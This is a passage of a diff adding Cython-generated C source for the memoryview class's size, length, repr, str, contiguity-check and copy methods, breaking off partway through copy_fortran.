*__pyx_pw_15View_dot_MemoryView_10memoryview_4size_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_4size___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4size___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_v_result = NULL; + PyObject *__pyx_v_length = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":600 + * @property + * def size(self): + * if self._size is None: # <<<<<<<<<<<<<< + * result = 1 + * + */ + __pyx_t_1 = (__pyx_v_self->_size == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":601 + * def size(self): + * if self._size is None: + * result = 1 # <<<<<<<<<<<<<< + * + * for length in self.view.shape[:self.view.ndim]: + */ + __Pyx_INCREF(__pyx_int_1); + __pyx_v_result = __pyx_int_1; + + /* "View.MemoryView":603 + * result = 1 + * + * for length in self.view.shape[:self.view.ndim]: # <<<<<<<<<<<<<< + * result *= length + * + */ + __pyx_t_3 = (__pyx_v_self->view.shape + __pyx_v_self->view.ndim); + for (__pyx_t_4 = __pyx_v_self->view.shape; __pyx_t_4 < __pyx_t_3; __pyx_t_4++) { + __pyx_t_2 = __pyx_t_4; + __pyx_t_5 = PyInt_FromSsize_t((__pyx_t_2[0])); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 603, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_XDECREF_SET(__pyx_v_length, __pyx_t_5); + __pyx_t_5 = 0; + + /* "View.MemoryView":604 + * + * for length in self.view.shape[:self.view.ndim]: + * result *= length # <<<<<<<<<<<<<< + * + * self._size = result + */ + __pyx_t_5 = PyNumber_InPlaceMultiply(__pyx_v_result, __pyx_v_length); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 604, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF_SET(__pyx_v_result, __pyx_t_5); + __pyx_t_5 = 0; + } + + /* "View.MemoryView":606 + * result *= length + * + * self._size = result # <<<<<<<<<<<<<< + * + * return self._size + */ + __Pyx_INCREF(__pyx_v_result); + __Pyx_GIVEREF(__pyx_v_result); + __Pyx_GOTREF(__pyx_v_self->_size); + __Pyx_DECREF(__pyx_v_self->_size); + __pyx_v_self->_size = __pyx_v_result; + + /* "View.MemoryView":600 + * @property + * def size(self): + * if self._size is None: # <<<<<<<<<<<<<< + * result = 1 + * + */ + } + + /* "View.MemoryView":608 + * self._size = result + * + * return self._size # <<<<<<<<<<<<<< + * + * def __len__(self): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->_size); + __pyx_r = __pyx_v_self->_size; + goto __pyx_L0; + + /* "View.MemoryView":598 + * return self.size * self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def size(self): + * if self._size is None: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.memoryview.size.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XDECREF(__pyx_v_length); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":610 + * return self._size + * + * def __len__(self): # <<<<<<<<<<<<<< + * if self.view.ndim >= 1: + * return self.view.shape[0] + */ + +/* Python wrapper */ +static Py_ssize_t __pyx_memoryview___len__(PyObject *__pyx_v_self); /*proto*/ +static Py_ssize_t __pyx_memoryview___len__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__len__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_10__len__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static Py_ssize_t __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_10__len__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("__len__", 0); + + /* "View.MemoryView":611 + * + * def __len__(self): + * if self.view.ndim >= 1: # <<<<<<<<<<<<<< + * return self.view.shape[0] + * + */ + __pyx_t_1 = (__pyx_v_self->view.ndim >= 1); + if (__pyx_t_1) { + + /* "View.MemoryView":612 + * def __len__(self): + * if self.view.ndim >= 1: + * return self.view.shape[0] # <<<<<<<<<<<<<< + * + * return 0 + */ + __pyx_r = (__pyx_v_self->view.shape[0]); + goto __pyx_L0; + + /* "View.MemoryView":611 + * + * def __len__(self): + * if self.view.ndim >= 1: # <<<<<<<<<<<<<< + * return self.view.shape[0] + * + */ + } + + /* "View.MemoryView":614 + * return self.view.shape[0] + * + * return 0 # <<<<<<<<<<<<<< + * + * def __repr__(self): + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":610 + * return self._size + * + * def __len__(self): # <<<<<<<<<<<<<< + * if self.view.ndim >= 1: + * return self.view.shape[0] + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":616 + * return 0 + * + * def __repr__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__, + * id(self)) + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview___repr__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_memoryview___repr__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_12__repr__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_12__repr__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__repr__", 0); + + /* "View.MemoryView":617 + * + * def __repr__(self): + * return "" % (self.base.__class__.__name__, # <<<<<<<<<<<<<< + * id(self)) + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_base); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_class); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_name_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":618 + * def __repr__(self): + * return "" % (self.base.__class__.__name__, + * id(self)) # <<<<<<<<<<<<<< + * + * def __str__(self): + */ + __pyx_t_2 = __Pyx_PyObject_CallOneArg(__pyx_builtin_id, ((PyObject *)__pyx_v_self)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 618, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + + /* "View.MemoryView":617 + * + * def __repr__(self): + * return "" % (self.base.__class__.__name__, # <<<<<<<<<<<<<< + * id(self)) + * + */ + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_2); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyString_Format(__pyx_kp_s_MemoryView_of_r_at_0x_x, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":616 + * return 0 + * + * def __repr__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__, + * id(self)) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.__repr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":620 + * id(self)) + * + * def __str__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__,) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview___str__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_memoryview___str__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__str__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_14__str__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_14__str__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__str__", 0); + + /* "View.MemoryView":621 + * + * def __str__(self): + * return "" % (self.base.__class__.__name__,) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_base); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_class); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_name_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = PyTuple_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_1); + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_MemoryView_of_r_object, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":620 + * id(self)) + * + * def __str__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__,) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.__str__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":624 + * + * + * def is_c_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_is_c_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_is_c_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_c_contig (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("is_c_contig", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "is_c_contig", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_16is_c_contig(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_16is_c_contig(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice *__pyx_v_mslice; + __Pyx_memviewslice __pyx_v_tmp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_c_contig", 0); + + /* "View.MemoryView":627 + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) # <<<<<<<<<<<<<< + * return slice_is_contig(mslice[0], 'C', self.view.ndim) + * + */ + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(__pyx_v_self, (&__pyx_v_tmp)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 627, __pyx_L1_error) + __pyx_v_mslice = __pyx_t_1; + + /* "View.MemoryView":628 + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) + * return slice_is_contig(mslice[0], 'C', self.view.ndim) # <<<<<<<<<<<<<< + * + * def is_f_contig(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_memviewslice_is_contig((__pyx_v_mslice[0]), 'C', __pyx_v_self->view.ndim)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 628, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":624 + * + * + * def is_c_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.is_c_contig", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":630 + * return slice_is_contig(mslice[0], 'C', self.view.ndim) + * + * def is_f_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_is_f_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_is_f_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_f_contig (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("is_f_contig", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "is_f_contig", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_18is_f_contig(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_18is_f_contig(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice *__pyx_v_mslice; + __Pyx_memviewslice __pyx_v_tmp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_f_contig", 0); + + /* "View.MemoryView":633 + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) # <<<<<<<<<<<<<< + * return slice_is_contig(mslice[0], 'F', self.view.ndim) + * + */ + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(__pyx_v_self, (&__pyx_v_tmp)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 633, __pyx_L1_error) + __pyx_v_mslice = __pyx_t_1; + + /* "View.MemoryView":634 + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) + * return slice_is_contig(mslice[0], 'F', self.view.ndim) # <<<<<<<<<<<<<< + * + * def copy(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_memviewslice_is_contig((__pyx_v_mslice[0]), 'F', __pyx_v_self->view.ndim)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 634, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":630 + * return slice_is_contig(mslice[0], 'C', self.view.ndim) + * + * def is_f_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.is_f_contig", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":636 + * return slice_is_contig(mslice[0], 'F', self.view.ndim) + * + * def copy(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice mslice + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_copy(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_copy(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("copy (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("copy", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "copy", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_20copy(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_20copy(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice __pyx_v_mslice; + int __pyx_v_flags; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("copy", 0); + + /* "View.MemoryView":638 + * def copy(self): + * cdef __Pyx_memviewslice mslice + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS # <<<<<<<<<<<<<< + * + * slice_copy(self, &mslice) + */ + __pyx_v_flags = (__pyx_v_self->flags & (~PyBUF_F_CONTIGUOUS)); + + /* "View.MemoryView":640 + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS + * + * slice_copy(self, &mslice) # <<<<<<<<<<<<<< + * mslice = slice_copy_contig(&mslice, "c", self.view.ndim, + * self.view.itemsize, + */ + __pyx_memoryview_slice_copy(__pyx_v_self, (&__pyx_v_mslice)); + + /* "View.MemoryView":641 + * + * slice_copy(self, &mslice) + * mslice = slice_copy_contig(&mslice, "c", self.view.ndim, # <<<<<<<<<<<<<< + * self.view.itemsize, + * flags|PyBUF_C_CONTIGUOUS, + */ + __pyx_t_1 = __pyx_memoryview_copy_new_contig((&__pyx_v_mslice), ((char *)"c"), __pyx_v_self->view.ndim, __pyx_v_self->view.itemsize, (__pyx_v_flags | PyBUF_C_CONTIGUOUS), __pyx_v_self->dtype_is_object); if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 641, __pyx_L1_error) + __pyx_v_mslice = __pyx_t_1; + + /* "View.MemoryView":646 + * self.dtype_is_object) + * + * return memoryview_copy_from_slice(self, &mslice) # <<<<<<<<<<<<<< + * + * def copy_fortran(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_memoryview_copy_object_from_slice(__pyx_v_self, (&__pyx_v_mslice)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 646, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":636 + * return slice_is_contig(mslice[0], 'F', self.view.ndim) + * + * def copy(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice mslice + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.copy", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":648 + * return memoryview_copy_from_slice(self, &mslice) + * + * def copy_fortran(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice src, dst + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_copy_fortran(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_copy_fortran(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("copy_fortran (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("copy_fortran", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "copy_fortran", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_22copy_fortran(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_22copy_fortran(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice __pyx_v_src; + __Pyx_memviewslice __pyx_v_dst; + int __pyx_v_flags; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("copy_fortran", 0); + + /* "View.MemoryView":650 + * def copy_fortran(self): + * cdef __Pyx_memviewslice src, dst + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS # <<<<<<<<<<<<<< + * + * slice_copy(self, &src) + */ + __pyx_v_flags = (__pyx_v_self->flags & (~PyBUF_C_CONTIGUOUS)); + + /* "View.MemoryView":652 + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS + * + * slice_copy(self, &src) # <<<<<<<<<<<<<< + * dst = slice_copy_contig(&src, "fortran", self.view.ndim, + * self.view.itemsize, + */ + __pyx_memoryview_slice_copy(__pyx_v_self, (&__pyx_v_src)); + + /* "View.MemoryView":653 + * + * slice_copy(self, &src) + * dst = slice_copy_contig(&src, "fortran", self.view.ndim, # <<<<<<<<<<<<<< + * self.view.itemsize, + * flags|PyBUF_F_CONTIGUOUS, + */ + 